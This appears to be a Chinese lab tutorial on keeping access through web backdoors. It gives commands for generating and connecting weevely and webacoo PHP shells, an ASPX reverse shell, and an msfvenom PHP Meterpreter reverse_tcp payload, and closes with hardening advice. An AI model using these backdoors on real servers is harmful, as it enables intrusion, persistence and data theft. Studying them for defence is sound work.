內網后滲透攻擊過程(實驗環境)--4、權限維持(2)

用途限制聲明,本文僅用于網絡安全技術研究、教育與知識分享。文中涉及的滲透測試方法與工具,嚴禁用于未經授權的網絡攻擊、數據竊取或任何違法活動。任何因不當使用本文內容導致的法律后果,作者及發布平臺不承擔任何責任。滲透測試涉及復雜技術操作,可能對目標系統造成數據損壞、服務中斷等風險。讀者需充分評估技術能力與潛在后果,在合法合規前提下謹慎實踐。

在這里,我們主要講述權限維持第二種講述,web后門以及防范。

Web后門

定義:?指上傳到Web服務器可訪問目錄中的腳本文件(如.php,?.aspx,?.jsp,?.asp),允許攻擊者通過HTTP/HTTPS請求在服務器上遠程執行操作系統命令。接下來就是講述幾個常見的Web后門,

1)Nishang下的Webshell

簡介:Nishang 是一個基于 PowerShell 的滲透測試工具包,其中包含多種 Webshell 變體。這些 Webshell 利用 PowerShell 的強大功能,可在 Windows 系統上執行命令、上傳 / 下載文件。

特點:

  • 基于 PowerShell,支持高級系統交互。
  • 可通過 HTTP/S 通信,隱蔽性較強。
  • 支持反向 Shell 和綁定 Shell 模式。

項目下載地址:https://github.com/samratashok/nishang

在Nishang中也存在ASPX的“大馬”,該模塊在、nishang\Antak-Webshell目錄下。使用該模塊可以進行編碼、執行腳本、上傳/下載文件等

我們把他放在目標機的web應用下,瀏覽器訪問即可,如圖所示

2)weevely后門

簡介:Weevely 是一款針對 PHP 環境的開源 webshell 工具,主要用于滲透測試中生成、管理和控制 PHP 類型的后門,因其隱蔽性強、功能豐富且操作便捷,被廣泛用于 Web 滲透場景。

核心特點

  1. 隱蔽性高
    Weevely 生成的 webshell 采用Base64 編碼字符串混淆技術,將核心邏輯隱藏在看似正常的 PHP 代碼中(例如偽裝成普通函數調用),傳統基于特征碼的查殺工具(如簡單關鍵詞匹配)難以識別。

  2. 功能模塊化
    集成了豐富的滲透模塊,支持文件操作、系統命令執行、數據庫交互、端口轉發、持久化控制等,滿足從初始入侵到深度控制的全流程需求。

  3. 交互便捷
    提供命令行客戶端,生成 webshell 后可通過客戶端直接連接目標,以 “交互式 shell” 的形式操作,類似 SSH 會話,降低操作復雜度。

這個工具kali自帶

生成 webshell
用戶通過 Weevely 的命令行工具,指定一個密碼(用于后續連接驗證)和輸出文件名,生成一個 PHP 格式的 webshell 文件。例如:

weevely generate 123456 /tmp/backdoor.php  # 生成密碼為123456的webshell  

生成的backdoor.php包含加密的核心邏輯,僅當攻擊者使用正確密碼連接時,才能激活并執行命令。

上傳文件

上傳目標服務器,

然后再連接,訪問

weevely http://ip/bachdoor.php 密碼

??成功連接,接下來就是通過一系列的命令進行操作了

這里我詳細介紹一下weevely的模塊功能,操作不再展示

審計類模塊(找漏洞 / 敏感信息)

模塊名功能說明
:audit_phpconf檢查 PHP 配置(如allow_url_fopendisable_functions),找安全隱患
:audit_suidsgid查找帶?SUID/SGID 權限?的文件(這類文件可能被用來提權,如/bin/su
:audit_filesystem審計文件系統權限(如敏感文件/etc/shadow是否被 Web 用戶可讀)
:audit_etcpasswd讀取/etc/passwd(收集系統用戶信息,輔助后續攻擊)

Shell 執行模塊(遠程命令 / 代碼)

模塊名功能說明
:shell_php直接執行?PHP 代碼(如?:shell_php "echo phpinfo();"
:shell_sh執行系統 Shell 命令(和shell命令類似,模塊化封裝)
:shell_su嘗試用?su?命令提權(需知道目標用戶密碼,如嘗試su root

系統信息收集

模塊名功能說明
:system_extensions收集 PHP 擴展(如是否開啟mysqliexec等危險模塊)和 Web 服務器信息
:system_info抓取系統核心信息(內核版本、OS 類型、Web 服務版本、PHP 版本等)

后門模塊(持久化 / 反向連接)

模塊名功能說明
:backdoor_reversetcp啟動?反向 TCP Shell(目標主動連攻擊者 IP + 端口,繞過防火墻出站限制)
:backdoor_tcp在目標機器?綁定 TCP 端口(攻擊者主動連該端口獲取 Shell,需目標端口可訪問)

文件操作模塊(上傳 / 下載 / 編輯)

模塊名功能說明
:file_upload上傳本地文件到目標服務器
:file_upload2web自動上傳文件到?Web 可訪問目錄(如/var/www/html,方便直接訪問)
:file_read讀取遠程文件內容(如/etc/passwd、數據庫配置文件)
:file_download下載遠程文件到本地(Weevely 客戶端所在機器)
:file_rm刪除遠程文件
:file_edit本地編輯器修改遠程文件(保存后自動上傳,方便改配置)
:file_gzip/:file_tar壓縮 / 解壓文件(批量下載時縮小體積,或隱藏惡意文件)

數據庫模塊(脫庫 / 提權)

模塊名功能說明
:bruteforce_sql暴力破解 SQL 數據庫(嘗試常用賬號密碼,支持 MySQL、PostgreSQL 等)
:sql_dump導出數據庫(類似mysqldump,批量下載表數據)
:sql_console進入 SQL 交互控制臺(直接執行查詢,如SHOW DATABASES;

網絡模塊(跳板 / 掃描)

模塊名功能說明
:net_php_proxy在目標安裝?PHP 代理(將目標當跳板,轉發攻擊者的 HTTP 請求)
:net_curl模擬curl發送 HTTP 請求(測試目標網絡訪問能力,或訪問內網服務)
:net_scanTCP 端口掃描(探測目標或內網主機的開放端口,找可利用服務)
3)webacoo后門

簡介:Webacoo(全稱?Web Backdoor Cookie)是一款?隱蔽型 Web 后門工具,專為滲透測試的后滲透階段設計,核心特點是利用 HTTP Cookie 傳輸指令和數據,躲避傳統安全設備檢測。

  • 作用:在已攻陷的 Web 服務器中植入后門,實現遠程命令執行、文件操作、權限維持
  • 隱蔽性原理
    命令和結果通過?HTTP Cookie?傳輸,而非普通 HTTP 請求體。關鍵 Cookie 參數:
    • cm:Base64 編碼的 Shell 命令(如cm=YmFzZTY0X2VuY29kZQ==對應base64_encode)。
    • cn:存儲命令結果的 Cookie 名稱(如服務器將結果存到result?Cookie)。
    • cp:結果的分隔符(避免與正常 Cookie 混淆)。

Webacoo 有?兩種核心模式,通過命令行參數切換:

1. 生成模式(-g):制作 PHP 后門

webacoo -g -o /path/backdoor.php

  • 作用:生成一個 PHP 后門文件(如backdoor.php),上傳到目標服務器的Web 可訪問目錄(如/var/www/html)。

2. 終端模式(-t):連接后門

webacoo -t -u http://目標IP/backdoor.php

  • 作用:連接已上傳的后門,進入交互終端,執行系統命令(如lswhoami)。

此工具kali自帶,無需安裝

生成后門

?放在目標服務器,瀏覽器訪問一下

進行連接

?成功連接,連接之后是一個仿真終端,能夠通過執行命令獲得信息。

????

也能夠通過使用命令load查找擴展模塊

這里解釋一下模塊的作用,操作不展示

數據庫模塊(MySQL/PostgreSQL)

1. MySQL 命令行模塊(mysql-cli)

mysql-cli <IP(:端口)> <用戶名> <密碼>

示例:連接本地 MySQL,用戶名為root,密碼為123456

webacoo$ mysql-cli 127.0.0.1 root 123456

連接后:可直接執行 SQL 命令(無需退出 Webacoo)

> SHOW DATABASES;
> USE wordpress;
> SELECT * FROM wp_users;

2. PostgreSQL 命令行模塊(psql-cli)

psql-cli <IP(:端口)> <數據庫名> <用戶名> <密碼>

示例:連接本地 PostgreSQL 的testdb數據庫

webacoo$ psql-cli 127.0.0.1:5432 testdb postgres 123456

連接后:執行 SQL 命令

> \dt        # 查看表
> SELECT * FROM users;

文件操作模塊(上傳 / 下載)

1. 上傳文件(upload)

upload <本地文件路徑> <遠程目標目錄>

示例:上傳本地的shell.php到目標服務器的/var/www/html目錄

webacoo$ upload /home/user/shell.php /var/www/html/

2. 下載文件(download)

download <遠程文件路徑>

示例:下載目標服務器的/etc/passwd文件到本地

webacoo$ download /etc/passwd

文件會保存到:Webacoo 工具所在目錄(默認不指定本地路徑)

隱蔽性增強模塊(stealth)

功能:通過修改 PHP 后門代碼,進一步隱藏后門特征

stealth <網站根目錄>

示例:將后門偽裝成網站正常文件(假設網站根目錄為/var/www/html

webacoo$ stealth /var/www/html

?與weevely相比

特性WebacooWeevely
通信方式HTTP CookieHTTP Headers(更隱蔽)
權限保護無密碼支持密碼驗證
功能豐富度基礎命令 / 文件操作模塊化(審計、提權、隧道)
適用場景臨時控制、快速滲透深度后滲透、長期維持
4)ASPX meterpreter后門

這個后門是msfconsole中名為shell_reverse_tcp的payload,shell_reverse_tcp是最基礎且常用的反向 TCP Shell?Payload,用于在目標系統上建立一個反向連接,使攻擊者能夠獲得遠程命令執行權限,利用這個模塊可以創建具有meterpreter的各種版本shellcode。

首先先使用下列代碼并且調用該模塊,并且設置相關參數

use windows/shell_reverse_tcp
info
set lhost ip
set lport 55555
save

?然后輸入generate -h查看命令

生成webshell?

generate -f aspx lhost=ip地址

將生成內容保存為aspx.aspx文件,然后上傳到目標服務器web目錄下,在瀏覽器進行訪問,然后使用監聽連接即可,這里不再展示。

進行訪問?

?進行連接

5)PHP meterpreter后門

簡介:PHP Meterpreter 是?Metasploit 框架?中針對?PHP 環境?設計的 payload,可生成具備?Meterpreter 交互功能?的 Webshell,支持系統命令執行、文件操作、權限提升等后滲透操作,是 Web 滲透中隱蔽且強大的工具。

優勢細節說明局限
功能集成度高繼承 Meterpreter 的交互性,支持 Metasploit 后續模塊(如提權、內網穿透)依賴 PHP 環境,需目標開啟執行權限
隱蔽性較好代碼默認經過混淆,通信可加密(如reverse_https?payload)易被 WAF 檢測特征(需額外混淆)
跨平臺兼容支持 Linux/Windows 的 PHP 服務器需目標disable_functions未禁用系統命令函數(如exec

直接通過msfvenom制作PHP Meterpreter

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php

然后跟上面ASPX差不多,將生成的文件放在目標服務器的web目錄下,然后開啟監聽,訪問,反彈連接即可,操作這里不再展示。?

web后門防范

  1. 代碼安全:禁用 eval、system 等危險函數;嚴格驗證用戶輸入(過濾特殊字符、限制長度);上傳文件需校驗內容(而非僅擴展名)。
  2. 組件管控:使用官方 / 可信源的框架 / 插件;定期更新修復漏洞;刪除無用組件。
  3. 服務器加固:web 進程權限設為最低(非 root);限制文件目錄權限(如上傳目錄禁止執行腳本);關閉不必要的服務 / 模塊(如 cgi、SSI)。
  4. 監控審計:日志記錄訪問 / 操作行為(重點查異常文件訪問、高頻 POST 請求);定期校驗文件哈希(檢測篡改)。
  5. 訪問控制:管理員賬戶用強密碼 + 定期更換;限制管理后臺訪問 IP;啟用二次驗證。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/916541.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/916541.shtml
英文地址,請注明出處:http://en.pswp.cn/news/916541.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

CentOS 9 配置國內 YUM 源

1.備份 sudo mv /etc/yum.repos.d/centos.repo /etc/yum.repos.d/centos.repo.backup sudo mv /etc/yum.repos.d/centos-addons.repo /etc/yum.repos.d/centos-addons.repo.backup2.創建新文件 vi /etc/yum.repos.d/centos.repo[baseos] nameCentOS Stream $releasever - BaseO…

【算法】遞歸、搜索與回溯算法入門

文章目錄遞歸什么是遞歸為什么會用到遞歸如何理解遞歸如何寫好一個遞歸搜索 vs 深度優先遍歷 vs 深度優先搜索 vs 寬度&#xff08;廣度&#xff09;優先遍歷 vs 寬度&#xff08;廣度&#xff09;優先搜索 vs 暴搜深度優先遍歷 vs 深度優先搜索&#xff08;dfs&#xff09;寬度…

借助Aspose.HTML控件,在 Python 中將 SVG 轉換為 PDF

您可能會發現許多解決方案都提供以編程方式將SVG轉換為PDF 的功能。但這篇博文將介紹一個功能強大的 SDK&#xff0c;供 Python 開發人員自動化文件轉換和操作。本指南將重點介紹通過 .NET 實現 Python 的 Aspose.HTML。此外&#xff0c;我們將逐步講解相關步驟和代碼片段&…

高級06-Java網絡編程:從Socket到HTTP

引言&#xff1a;Java 網絡編程的重要性 隨著互聯網技術的飛速發展&#xff0c;網絡編程已成為現代軟件開發中不可或缺的一部分。Java 作為一種廣泛應用于企業級開發和分布式系統的編程語言&#xff0c;提供了強大的網絡通信支持。從底層的 Socket 編程到高層的 HTTP 協議處理&…

STM32的藍牙通訊(HAL庫)

藍牙基礎知識&#xff08;了解即可&#xff09;&#xff1a;1.是一種利用低功率無線電&#xff0c;支持設備短距離通信的無線電技術&#xff0c;能在包括移動電話、PDAQ、無線耳機、筆記本電腦、相關外設等眾多設備之間進行無線信息交換&#xff0c;藍牙工作在全球通用的2.4 GH…

方案B,version1

我們重新設計起步階段的步驟,目標是:通過運行PowerShell腳本和配置GitHub Actions工作流(deploy.yml)來實現自動化部署。 要求: 用私有倉庫(my-website-source-SSH)存儲源碼。 通過GitHub Actions自動構建(這里只是簡單的Hello World,所以構建步驟可以簡化為復制文件…

Linux --- 進程

一、進程概念 在 Linux 系統中&#xff0c;??進程&#xff08;Process&#xff09;?? 是程序執行的動態實例&#xff0c;是操作系統進行資源分配和調度的基本單位。 ??1. 程序 vs 進程?? ??程序&#xff08;Program&#xff09;??&#xff1a;是靜態的代碼集合&…

Cgroup 控制組學習(三)在容器中使用 CGroups

一、CGroups 關于mememory的限制操作 cgroup關于cpu操作 關于memeory cgroup的幾個要點 ① memeory限額類 1、memory.limit_bytes&#xff1a;硬限制--> 限制最大內存使用量&#xff0c;單位有k、m、g三種&#xff0c;填-1則代表無限制,默認是字節2、memory.soft_limi…

SpringBoot面試基礎知識

SpringBoot 是面試中后端開發崗位的高頻考點&#xff0c;以下是核心考點整理&#xff1a;1. SpringBoot 基礎概念- 定義&#xff1a;SpringBoot 是 Spring 框架的簡化版&#xff0c;通過“自動配置”“起步依賴”等特性&#xff0c;簡化 Spring 應用的搭建和開發&#xff0c;減…

Java面試全方位解析:從基礎到AI的技術交鋒

Java面試全方位解析&#xff1a;從基礎到AI的技術交鋒 面試場景&#xff1a;互聯網大廠Java工程師崗位面試 面試官&#xff1a;您好&#xff0c;我是今天的面試官&#xff0c;接下來我們將進行三輪技術面試。 謝飛機&#xff1a;您好您好&#xff01;我是謝飛機&#xff0c;特別…

Web Worker:解鎖瀏覽器多線程,提升前端性能與體驗

目錄 一、Web Worker 是什么&#xff1f; 核心特性 類型 二、為什么需要 Web Worker&#xff1f;(單線程的痛點) 三、Web Worker 的典型使用場景 四、一個簡單的代碼示例 (專用 Worker) 五、使用 Web Worker 的注意事項 六、總結 一、Web Worker 是什么&#xff1f; 簡…

LabVIEW命令行調用與傳參功能

該功能一方面借助 Formatinto String 構建命令行字符串&#xff0c;實現LabVIEW 環境下命令行調用 VI 并傳參&#xff1b;另一方面&#xff0c;針對 Mac 平臺&#xff0c;通過解析應用 Info.plist 文件&#xff0c;處理 LabVIEW 可執行文件路徑&#xff0c;完善跨平臺命令行調用…

使用FRP搭建內網穿透工具,自己公網服務器獨享內外網端口轉發

內網穿透&#xff0c;也即 NAT 穿透&#xff0c;進行 NAT 穿透是為了使具有某一個特定源 IP 地址和源端口號的數據包不被 NAT 設備屏蔽而正確路由到內網主機。簡單來說&#xff0c;就是讓互聯網&#xff08;外網&#xff09;設備能訪問局域網&#xff08;內網&#xff09;設備提…

JavaWeb01——基礎標簽及樣式(黑馬視頻筆記)

1.如何用VScode寫html代碼 1. 首先在vscode上安裝一些插件&#xff0c;插件如下&#xff1a; 2.打開你要寫入的html文件的文件夾&#xff0c;然后右擊“ 新建文件”&#xff0c;命名 “xxx.html”, 3.如果是寫 css文件&#xff0c;那么也是右擊“新建文件”&#xff0c;命名“x…

在2G大小的文件中,找出高頻top100的單詞

將 2GB 的大文件分割為 2048 個大小為 512KB 的小文件&#xff0c;采用流式讀取方式處理&#xff0c;避免一次性加載整個文件導致內存溢出。初始化一個長度為 2048 的哈希表數組&#xff0c;用于分別統計各個小文件中單詞的出現頻率。利用多線程并行處理機制遍歷所有 2048 個小…

基于LNMP分布式個人云存儲

1.準備工作a.關閉兩臺虛擬機的安全軟件客戶端&#xff1a;[rootmaster ~]# systemctl stop firewalld [rootmaster ~]# systemctl disable firewalld [rootmaster ~]# systemctl status firewalld ○ firewalld.service - firewalld - dynamic firewall daemonLoaded: loaded (…

指針運算全攻略:加減、比較與排序

常見的指針指針運算說明1.指針與整數的加減運算對指針可以進行加法運算&#xff0c;即p n或者p - n。其結果依舊是一個是一個指針&#xff0c;新的指針是在原來的地址值基礎上加上/減去n *(sizeof(指針指向的數據類型)&#xff09;個字節。示例&#xff1a;#include<stdio.…

物聯網安裝調試-物聯網網關

物聯網網關作為連接終端設備與云平臺的核心樞紐,其分類與選型需結合功能定位、硬件性能、連接方式及應用場景等多維度考量。以下從分類體系和產品推薦兩方面系統梳理,助您高效決策: ?? 一、物聯網網關分類體系 1. 按功能定位劃分 類型 核心能力 典型場景 代表產品 邊緣計…

Jenkins教程(自動化部署)

Jenkins教程(自動化部署) 1. Jenkins是什么&#xff1f; Jenkins是一個開源的、提供友好操作界面的持續集成(CI)工具&#xff0c;廣泛用于項目開發&#xff0c;具有自動化構建、測試和部署等功能。Jenkins用Java語言編寫&#xff0c;可在Tomcat等流行的servlet容器中運行&…

linux 驅動驗證是否成功 之 查看moudle信息

這些是 Linux 內核模塊&#xff08;.ko&#xff09;中的元信息&#xff08;metadata&#xff09;&#xff0c;可以通過如下方式查看&#xff1a;? 1. 使用 modinfo 命令查看已加載或已編譯模塊信息 示例&#xff1a; modinfo aw2013.ko輸出內容大概如下&#xff1a; filename:…